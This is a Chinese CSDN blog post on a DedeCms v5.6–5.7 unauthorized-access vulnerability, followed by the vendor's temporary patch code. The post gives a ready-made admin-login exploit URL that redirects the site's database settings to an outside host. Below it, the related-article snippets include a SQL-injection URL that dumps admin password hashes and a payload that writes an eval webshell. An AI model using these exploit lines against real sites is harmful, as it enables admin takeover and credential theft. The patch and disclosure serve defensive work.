php越权访问漏洞,织梦(DedeCms) v5.6-5.7 越权访问漏洞

最新推荐文章于 2023-07-02 16:48:31 发布
最新推荐文章于 2023-07-02 16:48:31 发布
阅读量651 收藏 1
点赞数
文章标签: php越权访问漏洞
该博客揭示了一个织梦网站后台的安全漏洞,攻击者只需修改特定验证码即可直接登录。官方建议临时解决方案是更新include/common.inc.php文件,通过新增函数CheckRequest来过滤非法请求变量,以增强系统安全性。
摘要由CSDN通过智能技术生成

http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

把上面validate=dcug改为当前的验证码,即可直接进入网站后台

此漏洞的前提是必须得到后台路径才能实现

官方临时解决办法:

找到include/common.inc.php文件,把:

foreach($_REQUEST as $_k=>$_v)

{

var_dump($_k);

if( strlen($_k)>0 && preg_match(''#^(cfg_|GLOBALS)#'',$_k) )

{

exit(''Request var not allow!'');

}

}

换成:

//检查和注册外部提交的变量

function CheckRequest(&$val) {

if (is_array($val)) {

foreach ($val as $_k=>$_v) {

CheckRequest($_k);

CheckRequest($val[$_k]);

}

} else

{

if( strlen($val)>0 && preg_match(''#^(cfg_|GLOBALS)#'',$val) )

{

exit(''Request var not allow!'');

}

}

}

CheckRequest($_REQUEST);

zha567
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
《WEB安全渗透测试》(18)DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2)
午夜安全
11-17 3661
《WEB安全渗透测试》(18)DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2) 接着上一篇,我们已经获取到一个webshell,这篇文章是后续提权及漏洞利用。(1)systeminfo生成文件systeminfo >dedecms.txt(2)更新windows-exploit-suggester下载windows-exploit-suggester.py后,先安装xlrd,之后才可以更新。...
漏洞复现】皓峰防火墙系统越权访问漏洞
最新发布
晚风不及你
01-29 707
皓峰防火墙系统是一款为企业提供安全防护的软件系统。它可以对网络中的数据流进行实时监控,并根据预定的安全策略对进出网络的数据包进行过滤、管理,从而保证网络的安全性。
DEDECMS v5.6漏洞复现
_Ralph的博客
01-16 7970
织梦内容管理系统(dedecms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类cms系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 闲来无事,复现一下dedecms v5.6版
织梦v5.6版本漏洞
weixin_61842894的博客
02-07 384
织梦v5.6版本漏洞
【原】织梦dedecms v5.6 discuz7.2 xss漏洞
步满生错的专栏
09-28 2583
2010年07月05日 星期一 23:31 由于某度众所周知的举动,让我搬离写了5年的渣度空间,准备把技术性的文章定在CSDN了。这些都是文章备份。勿怪。。 鉴于最近有些抓取机器和抄袭者,把标题的【原】字都复制,我不得不声明:本文为 yukon12345原创,转载请注明出
dedecms织梦 v5.6 两处跨站漏洞
weixin_33928137的博客
03-21 183
漏洞版本: dedecms织梦 v5.6 漏洞描述: DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在...
DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞已经公布)
weixin_33742618的博客
04-19 427
2019独角兽企业重金招聘Python工程师标准>>> ...
dedecms v5.7越权漏洞复现
xxxMIng的博客
12-28 1986
环境搭建: 在win7x64上安装phpstudy 将网站源码 放置于C:\phpStudy\PHPTutorial\WWW\dedecms 并启动phpstudy 将运行模式放在系统服务上 应用 从物理机上访问该地址的index.php网页 进行下一步继续设定数据密码为root 管理员登陆 admin 密码 admin 点击继续即可完成搭站 ...
织梦dedecms漏洞修复大全(5.7起)
东北狼仙
01-27 1077
很多人说dedecms不好,因为用的人多了,找漏洞的人也多了,那么如果我们能修复的话,这些都不是问题. 好,我们来一个一个修复。修复方法都是下载目录下该文件,然后替换或添加部分代码,保存后上传覆盖(记得先备份),这样的好处是防止用懒人包上传之后因为UTF8和GBK不同产生乱码,或者修改过这几个文件,然后直接修改的部分被替换掉,那之前就白改了,找起来也非常的麻烦。如果你搜索不到,...
逻辑漏洞越权详解-漏洞银行大咖周6-浅安
01-26
### 逻辑漏洞越权详解 #### 一、引言 在网络安全领域,逻辑漏洞一直是一个备受关注的话题。相比传统的安全漏洞,如SQL注入、XSS跨站脚本攻击等,逻辑漏洞因其隐蔽性和复杂性而更为棘手。在众多逻辑漏洞中,...
怎么解决php中的越权访问,WEB安全系列之《如何挖掘越权漏洞
weixin_34170028的博客
03-16 484
0x01 前言我作为一个彩笔,很荣幸成为签约作家团的一员,今天,就来讲讲越权,今天会举三个例子,一个代码审计,两个黑盒测试。0x02什么是越权越权漏洞是Web应用程序中一种常见的安全漏洞。它的威胁在于一个账户即可控制全站用户数据。当然这些数据仅限于存在漏洞功能对应的数据。越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定。所以测试越权就...
浅谈逻辑漏洞中的越权访问漏洞
PICACHU+++的博客
07-02 474
水平越权:通过更换的某个ID之类的身份标识,从而使A账号获得(增删查改)B账号的数据垂直越权:使用低权限身份的账号,发送高权限账号的请求,获得其高权限的操作未授权访问:通过删除请求中的认证信息后重放该请求,依旧可以访问或者完成操作假设用户A和用户B属于同一角色,拥有相同的权限等级,他们能获取自己的私有数据(数据A和数据B),但如果系统只验证了能访问数据的角色,而没有对数据做细分或者校验,导致用户A能访问到用户B的数据(数据B),那么用户A访问数据的这种行为就叫做水平越权访问
DeDeCMS 越权
Darklord.W
04-13 893
DeDeCMS 越权 0x00 搭建dedecms 设置数据库密码 开启会员功能 0x01 注册会员 并在后台设置为通过审核 0x03 越权操作 创建000001用户 2、000001用户登陆,BP抓包 修改数据包 登陆至admin F12修改cookie值 修改admin会员密码 192.168.8.135/dedecms/membe...
DedeCms v5.6 嵌入恶意代码执行漏洞
Yatere的天平秤
04-25 1230
在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name/="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行a{/dede:link}{dede:toby57 name/="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz
DedeCms V5.6 parse_str函数引起的sql注入漏洞
今天也要加油鸭
04-13 1202
这个是去年跟着红日代码审计复现的织梦cms有parse_str()函数引起的漏洞,特来记录一下。 一、下载 下载地址:http://www.dedecms/upimg/soft/2010/DedeCmsV5.6-UTF8-Final.tar.gz 二、安装 ...
php 5.6.15漏洞,DEDECMS 5.6最新Get Shell漏洞 DEDECMS 5.3/5.6
weixin_39636333的博客
03-11 205
DEDECMS 5.6最新Get Shell漏洞影响版本:  DEDECMS 5.3/5.6漏洞描述:DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目前已经有超过二十万个站点正在使用DedeCms或居...
dedecms 漏洞汇总
热门推荐
积木网络
02-29 1万+
Dedecms 5.6 rss注入漏洞   http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1 DedeCms v5.6 嵌入
DeDecms任意用户登录,管理员密码重置漏洞
鸥鹭忘机
07-28 3861
基本信息 漏洞编号:SSV-97087 实验版本:dedecms v5.7SP2 下载地址:http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-UTF8-SP2.tar.gz 参考文章:https://www.seebug.org/vuldb/ssvid-97074 前置知识 如果要把一个key存储到cookie中,织梦的存储方式是把key和加密key同时存储在cookie中。每次读取用户传来的key时,将key进行加密后与传来的加密k
php漏洞集合
weixin_50683638的博客
10-11 2321
第三章 常见的php漏洞集合 1.sql注入漏洞 0x01 注入介绍 1.什么是sql注入 用户输入的参数被当成sql语句在数据库里执行,这就是sql注入漏洞 2.sql注入的危害 sql注入轻则获取数据库信息,重则获取服务器权限。 0x02 搭建sqli-labs靶机 0.介绍 SQLI-LABS是学习SQLI的平台 sqli-labs下载链接:https://github.com/Audi-1/sqli-labs 环境:phpstudy+windows10 1.创建网站(注意php版本选择5.6) 2
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值